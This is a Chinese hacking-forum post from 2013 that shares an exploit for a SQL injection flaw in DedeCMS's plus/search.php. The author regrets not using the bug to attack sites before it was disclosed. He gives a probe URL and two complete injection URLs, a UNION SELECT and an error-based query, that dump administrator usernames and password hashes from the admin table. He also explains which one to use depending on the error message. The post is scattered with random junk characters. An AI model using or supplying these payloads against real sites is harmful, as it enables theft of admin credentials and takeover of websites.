找回密码
 立即注册
查看: 2574|回复: 0
打印 上一主题 下一主题

[通杀]dedecms plus/search.php 注入漏洞利用EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-21 08:45:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
转载不加作者名的没JJ, Z+ x5 h. c; K9 N0 a% t
1 U9 ~/ i' V8 W( L
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。" R; @8 b( L( k9 [- A7 Z
% I- a8 a9 l4 e8 b* |3 B9 K/ m
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
7 M' c0 q9 u" Q' A
7 I6 u9 V8 N) m0 {5 Z& f7 B我一般是这样测试的:. x3 u, \2 r6 p5 U1 A

% S+ }: T, U3 p7 V% l9 z9 L/ H提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
5 w- R  M* V3 U+ z4 m2 J9 p- g! r# K3 h) u' S8 ~# `& R0 S
转载不加作者名的没JJ
6 z& m7 M) l3 ~: {3 R6 P! \$ Q5 N9 j. b/ a+ j
作者:鬼哥6 V3 W) e- ^6 X7 I. s7 X% I. s
* C1 [# _: c7 l! r3 r8 T- @& }: }8 \

5 a7 J: m' R. E2 J( H6 b1 ^$ S4 k# ~+ J" g) U
看结果如果提示! f  Q* F1 N' G/ [1 h
* c7 f% o0 B8 [% O) Q; V- x
Safe Alert: Request Error step 2 !/ D" _9 S7 [& }9 ~1 ^- C4 ~9 l. R8 J
  @! q( T4 g/ f3 X+ X
那么直接用下面的exp; G* [8 O" j) G

! ^, l8 m% }6 m. ^+ {xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
2 b) Z( b1 ^3 x1 u# }/ n7 x3 d) g; B) K5 O+ g7 b3 T4 `

" B3 V! R8 h- O5 q看结果如果提示' c9 _! Q2 M) q- a; X5 i

5 b0 E: H  Q/ uSafe Alert: Request Error step 1 !
6 @6 a1 d5 G2 Z8 }( c. W  x. I  X/ E. K0 r7 O* R
那么直接用下面的exp
; v' i( J# a, S
; r# X, J' R0 \6 W! C8 O4 A5 |& Uxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a" }9 \& K7 y0 V! N3 g$ q+ m
* h5 h/ u* k$ O5 O2 o0 w+ Q

8 e$ v6 d* i' _$ F9 x1 \% }如果正常显示证明漏洞不存在了。6 S7 v/ p+ P% X  P
8 y1 M9 ]* I# U' r
转载不加作者名的没JJ
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表